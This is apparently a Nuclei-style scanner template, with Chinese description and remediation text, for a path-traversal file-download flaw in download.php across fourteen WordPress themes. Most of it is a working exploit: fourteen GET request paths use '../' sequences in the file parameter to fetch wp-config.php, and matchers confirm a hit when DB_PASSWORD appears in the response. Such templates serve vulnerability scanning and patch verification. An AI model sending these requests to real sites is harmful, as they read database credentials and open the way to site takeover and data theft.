id: Wordpress-Multiple_Themes-ArbitraryFileDownload
info:
  name: WordPress_Multiple_themes_-download.php_Arbitrary_File_Download
  author:
  - l0ne1y
  description: |-
    WordPress 多个主题download.php存在路径遍历导致文件下载漏洞
    WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress theme是一种应用主题。

    在多个wordpress主题中都有download.php，该页面设置不言会导致攻击者通过file参数下载系统任意文件。
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/themes/

    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    condition: or
    dsl:
    - ' contains(body_1,"DB_PASSWORD") && status_code_1==200'
    - ' contains(body_2,"DB_PASSWORD") && status_code_2==200'
    - ' contains(body_3,"DB_PASSWORD") && status_code_3==200'
    - ' contains(body_4,"DB_PASSWORD") && status_code_4==200'
    - ' contains(body_5,"DB_PASSWORD") && status_code_5==200'
    - ' contains(body_6,"DB_PASSWORD") && status_code_6==200'
    - ' contains(body_7,"DB_PASSWORD") && status_code_7==200'
    - ' contains(body_8,"DB_PASSWORD") && status_code_8==200'
    - ' contains(body_9,"DB_PASSWORD") && status_code_9==200'
    - ' contains(body_10,"DB_PASSWORD") && status_code_10==200'
    - ' contains(body_11,"DB_PASSWORD") && status_code_11==200'
    - ' contains(body_12,"DB_PASSWORD") && status_code_12==200'
    - ' contains(body_13,"DB_PASSWORD") && status_code_13==200'
    - ' contains(body_14,"DB_PASSWORD") && status_code_14==200'
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php'
  - '{{BaseURL}}/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/markant/download.php?file=../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/yakimabait/download.php?file=./wp-config.php'
  - '{{BaseURL}}/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/felis/download.php?file=../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/epic/includes/download.php?file=wp-config.php'
  - '{{BaseURL}}/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
  - '{{BaseURL}}/wp-content/themes/lote27/download.php?download=../../../wp-config.php'
  method: GET
